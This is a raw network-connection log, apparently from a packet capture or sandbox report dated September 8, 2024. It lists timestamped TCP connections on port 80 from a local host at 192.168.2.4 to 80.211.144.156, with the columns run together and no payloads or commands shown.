                                                          Sep 8, 2024 11:52:16.165653944 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.259923935 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.306314945 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.382258892 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.383131027 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.387608051 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.387658119 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.387897015 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.387959003 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.388066053 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.392846107 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.743978024 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:16.749105930 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.749133110 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.749145985 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.058253050 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.103178978 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.189481974 CEST804975080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.243788958 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.304980993 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.310101986 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.310214996 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.310313940 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.316174030 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.665839911 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:17.671103001 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.671114922 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.671123028 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:17.976203918 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.025036097 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.176503897 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.228269100 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.311184883 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.311907053 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.316833973 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.316852093 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.316920996 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.316953897 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.317027092 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.321830988 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.665863991 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.800426006 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.800462008 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.800472021 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.987389088 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.040656090 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.116755962 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.165668964 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.240837097 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.241498947 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246150017 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.246223927 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246459961 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.246519089 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246618986 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.251537085 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.603374958 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.650043011 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.776573896 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776592970 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776603937 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776613951 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.923357964 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.978199959 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.138448000 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.181412935 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.213201046 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.213912010 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218494892 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.218612909 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218708992 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.218775034 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218888998 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.223647118 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.266912937 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.310102940 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.315386057 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.315512896 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.315707922 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.317866087 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.320522070 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.665802002 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.670788050 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.670814991 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.670825005 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.688082933 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.688143015 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.980123997 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.025155067 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.109177113 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.150100946 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.226319075 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.227113962 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.231431007 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.231506109 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.231998920 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.232067108 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.232206106 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.236969948 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.587627888 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.592609882 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.592629910 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.592639923 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.904670000 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.947009087 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.105689049 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.150029898 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.226073980 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.230997086 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.231070995 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.231185913 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.236013889 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.587646961 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.592721939 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.592736006 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.592747927 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.897002935 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.946933985 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.108097076 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.150027037 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.224843979 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.225406885 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230175972 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.230191946 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.230228901 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230269909 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230359077 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.235079050 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.587661982 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.592812061 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.592825890 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.592835903 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.915910959 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.962630033 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.052599907 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.103202105 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.179056883 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.179663897 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184271097 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.184326887 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184510946 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.184587955 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184771061 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.189569950 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.540755987 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.545934916 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.545948029 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.545958996 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.855643988 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.900043964 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.986383915 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.040709972 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.100416899 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.101150990 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.105731010 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.105812073 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.105942965 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.106002092 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.106090069 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.110794067 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.322561026 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.323263884 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.328253984 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.328329086 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.328500032 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.333376884 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.373938084 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.445175886 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.450073957 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.450136900 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.450258017 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.455020905 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.572609901 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.572665930 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.681519032 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.686557055 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.686651945 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.806585073 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.811621904 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.811638117 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.811647892 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.001065016 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.040652037 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.132617950 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.181301117 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.210725069 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.262236118 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.264496088 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.306312084 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.381984949 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.381984949 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.382738113 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387010098 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387064934 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387301922 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387346029 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387528896 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387588024 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387701035 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.393450022 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.743978024 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.751665115 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.751683950 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.751692057 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.048445940 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.103290081 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.251797915 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.306504011 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.366168976 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.371047020 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.371118069 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.371238947 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.375997066 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.728380919 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.733560085 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.733576059 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.733584881 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.037736893 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.087538004 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.165520906 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.212544918 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.288441896 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.289401054 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.415688992 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.415776968 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.415843010 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.416147947 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.416232109 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.416232109 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.416476011 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.421253920 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.775190115 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.780251026 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.780270100 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.780280113 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.099853039 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.150114059 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.232681990 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.275079966 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.350492954 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.351188898 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.355870962 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.355968952 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.356021881 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.356091976 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.356218100 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.360958099 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.712657928 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.717677116 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.717694998 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.717705965 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.024229050 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.071947098 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.157253027 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.212547064 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.269524097 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.273108006 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.273741007 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.278774023 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.278815985 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.278863907 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.278913021 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.279043913 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.285461903 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.634546041 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:30.639699936 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.639751911 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.639780045 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:30.974498987 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.025089979 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.110347033 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.165684938 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.213174105 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.213903904 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.218333960 CEST806471680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.218419075 CEST6471680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.218678951 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.218732119 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.218843937 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.223627090 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.225862980 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.230726957 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.230798960 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.230880976 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.235717058 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.572021961 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.578648090 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.580801964 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.587641001 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.594225883 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.594238043 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.594248056 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.882287025 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.895951986 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:31.931288004 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:31.946913958 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.012661934 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.013838053 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.018963099 CEST806471880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.019040108 CEST6471880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.056402922 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.131304979 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.131994009 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.136424065 CEST806471780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.136497021 CEST6471780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.136797905 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.136857033 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.136959076 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.141683102 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.493875980 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.498986959 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.499000072 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.499011040 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.802190065 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.853176117 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:32.936686993 CEST806471980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:32.978212118 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.053168058 CEST6471980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.054884911 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.059782028 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.059859037 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.060604095 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.065363884 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.415863037 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.420953989 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.420968056 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.420975924 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.743390083 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.790730953 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.876543999 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.931375980 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.991075039 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.991794109 CEST6472180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.997231007 CEST806472080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.997318029 CEST6472080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.997339964 CEST806472180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:33.997421026 CEST6472180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:33.997539997 CEST6472180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:34.003148079 CEST806472180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:34.353260040 CEST6472180192.168.2.480.211.144.156
